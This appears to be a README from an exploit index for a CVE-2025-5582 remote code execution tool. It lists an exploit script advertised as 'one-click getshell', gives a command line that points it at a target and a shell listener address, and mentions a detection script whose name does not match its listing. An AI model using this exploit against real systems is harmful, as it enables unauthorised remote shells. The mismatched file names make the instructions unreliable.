Share
## https://sploitus.com/exploit?id=06480783-52AE-5BE3-BDD8-E6D21DA53BA0
# CVE-2025-5582 RCE  
A self-use checking tool for detecting the CVE-2025-5582 vulnerability  

## Description of the tool  
- `exp.py`: Vulnerability exploitation code (allows one-click getshell).  
- `cve-2025-5582-check.sh`: Host vulnerability detection tool.  

## How to use it  
```bash
python3 exp.py -t http://127.0.0.1:8080/ -a 127.0.0.1:4444
```  

## Command for detection  
```shell
CVE-2025-66478-Check.sh [-h] [-f ] [-a]
```  

# Disclaimer  
**This tool is only intended for security research purposes. Do not use it for illegal purposes.**